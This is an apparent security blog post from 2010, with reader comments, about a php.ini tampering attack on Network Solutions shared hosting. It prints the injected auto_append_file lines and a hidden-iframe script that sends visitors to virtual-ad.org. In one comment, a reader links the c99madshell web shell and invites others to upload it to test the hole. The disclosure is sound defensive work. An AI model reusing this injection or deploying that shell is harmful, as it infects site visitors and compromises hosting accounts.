Last week we reported about an attack against Network Solutions that modified the “php.ini” file on hundreds of sites to append a malicious payload to all of their pages.
You can read more about it here:
https://blog.sucuri.net/2010/05/new-infections-today-at-network.html
The problem was caused by an internal bug on Network Solutions that was supposedly fix already.
Yet, this morning we started to receive reports of a very similar kind of attack against sites on their shared servers. According to the time stamp of files, they were added between 1 and 2am today (May 7th).
First, the cgi-bin/php.ini had this extra lines:
include_path=”.”;
;;;;;;;;;;;;;;;;;;;
display_errors= off;
;;;;;;;;;;;;;;;;;;;
error_reporting=0;
;;;;;;;;;;;;;;;;;;;
auto_append_file = .nts;
;;;;;;;;;;;;;;;;;;;
See the “auto_append_file”? It means that for every page the .nts script will be called and appended to the site.
We were able to download the .nts file and it is very similar to this one: http://sucuri.net/malware/entry/MW:GREPADD:2. Except that now it sends the victims to the domain http://virtual-ad.org by using this iframe:
document.write(‘< iframe frameborder=”0″>
onload=’ if (!this.src){
this.src=”http://virtual-ad.org/in.cgi?2″;
this.height=0; this.width=0;} ‘>< /iframe>’);
One thing interesting is that this new domain is also hosted at 188.124.16.133 and registered by:
Registrant Name:Neverglovskiy Vadim
Registrant Organization:Neverglovskiy Vadim
Registrant Email:alex1978a@bigmir.net
If you are at Network Solutions check your site now to make sure it is clean. If you have more information, share with us.
*Also, note that your site will not get blacklisted because of this malware. It avoids the Google crawler, but will still infect your users.
**Video removed. We don’t want to be giving views/attention to criminals/script kiddies that just want to show off.
As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.
We at http://www.thevirtualtouch.com are hosted by Network Solutions and did get Blacklisted at 2pm today 5/7/10 because of the Virtual-ad. org malware. We do not see the script on the infected pages and we do not know if this was a "Timed" malware or it is hidden. When we contacted Network Solutions, instead of admitting that there was the malware problem, we were told to contact Google to straighten out the problem! NetSol just lost my business!
After seeing that youtube video you posted I'm tempted to contact some of the customers via their still functional website because if they haven't tried to access their FTP or file manager they're none the wiser. Yet the video shows their files and file structures!
Today I was using FTP getting a website ready for launch and it stopped working, mid-transfer. Too bad my client already bought their hosting package at NS. A google search reveals scary careless stuff, on NS's part. My client will definitely not be renewing!!
This can likely be real and probably isn't terribly hard to do. Notice the permission listed on the top, "drwxr-wr-x", since its world-readable, the person can browse around in the file tree. If there are some directories or files with o+w permission, the hacker can drop their own code into the file/dir.
Many shared host are vuln to this type of attack, esp. ones that allow user to do chmod a dir since non-savvy users don't realize the implications of applying a o+w permission to a web-accessible file/dir.
Btw, they are using a PHP shell called "c99madshell":
http://madnet.name/files/download/9_c99madshell.php
If someone has a NS acct (I don't) and wants to try and verify it, upload the PHP shell and see if you can do the same as the video. =P
Just my 2 cents.
Your scan of http://www.lcdtvassociation.org found MW:JS:205 on 03 Jun 10, so the problem persists.